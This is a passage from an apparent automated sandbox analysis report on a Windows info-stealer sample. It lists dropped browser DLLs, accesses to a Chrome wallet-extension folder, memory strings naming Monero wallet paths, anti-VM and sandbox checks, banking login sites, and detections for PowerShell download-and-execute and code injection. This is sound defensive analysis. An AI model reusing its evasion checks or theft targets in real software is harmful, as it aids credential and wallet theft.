                              Source: C:\Users\user\Desktop\out.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: mozglue.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: msvcp140.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                              Source: Binary string: freebl3.pdb source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: mozglue.pdbP source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: freebl3.pdbp source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: nss3.pdb@ source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: softokn3.pdb@ source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: out.exe, 00000000.00000002.2695905232.0000000049DE1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: out.exe, 00000000.00000002.2690538362.000000003DF10000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
                              Source: Binary string: nss3.pdb source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: out.exe, 00000000.00000003.2392913103.000000000303A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2393034605.000000000303D000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mozglue.pdb source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: softokn3.pdb source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

                              Data Obfuscation

                              barindex
                              Detected unpacking (creates a PE file in dynamic memory)
                              Source: C:\Users\user\Desktop\out.exeUnpacked PE file: 0.2.out.exe.27650000.3.unpack
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00038950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00038950
                              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004F142 push ecx; ret 0_2_0004F155
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00042D3B push esi; ret 0_2_00042D3D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003DDB5 push ecx; ret 0_2_0003DDC8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44B536 push ecx; ret 0_2_6C44B549
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00038950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00038950
                              Source: C:\Users\user\Desktop\out.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\out.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Yara detected AntiVM3
                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              Source: out.exeBinary or memory string: DIR_WATCH.DLL
                              Source: out.exeBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                              Source: out.exeBinary or memory string: SBIEDLL.DLL
                              Source: out.exeBinary or memory string: API_LOG.DLL
                              Source: C:\Users\user\Desktop\out.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,0_2_0002180D
                              Source: C:\Users\user\Desktop\out.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\out.exeAPI coverage: 9.1 %
                              Source: C:\Windows\SysWOW64\timeout.exe TID: 1848Thread sleep count: 81 > 30Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00030EEEh0_2_00030DDB
                              Source: C:\Users\user\Desktop\out.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0003543D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00034CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00034CC8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00029D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00029D1C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00021D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00021D80
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002D5C6
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0002B5DF
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0002BF4D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00035FD1
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002B93F
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00035B0B
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0002CD37
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00035142
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030FBA GetSystemInfo,wsprintfA,0_2_00030FBA
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWNO
                              Source: GCAKKE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: GCAKKE.0.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: GCAKKE.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: out.exe, 00000000.00000003.2297618303.0000000002F9B000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:-
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: GCAKKE.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: GCAKKE.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: GCAKKE.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: GCAKKE.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: GCAKKE.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: GCAKKE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: GCAKKE.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: GCAKKE.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: GCAKKE.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: GCAKKE.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: GCAKKE.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: GCAKKE.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: GCAKKE.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: GCAKKE.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\out.exeAPI call chain: ExitProcess graph end nodegraph_0-73093
                              Source: C:\Users\user\Desktop\out.exeAPI call chain: ExitProcess graph end nodegraph_0-73077
                              Source: C:\Users\user\Desktop\out.exeAPI call chain: ExitProcess graph end nodegraph_0-74417
                              Source: C:\Users\user\Desktop\out.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0003D016
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00038950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00038950
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000214AD mov eax, dword ptr fs:[00000030h]0_2_000214AD
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002148A mov eax, dword ptr fs:[00000030h]0_2_0002148A
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000214A2 mov eax, dword ptr fs:[00000030h]0_2_000214A2
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003859A mov eax, dword ptr fs:[00000030h]0_2_0003859A
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00038599 mov eax, dword ptr fs:[00000030h]0_2_00038599
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00031807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,0_2_00031807
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0003D016
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0003D98C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004762E SetUnhandledExceptionFilter,0_2_0004762E
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C44B66C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C44B1F7
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C5FAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C5FAC62

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Yara detected Powershell download and execute
                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Contains functionality to inject code into remote processes
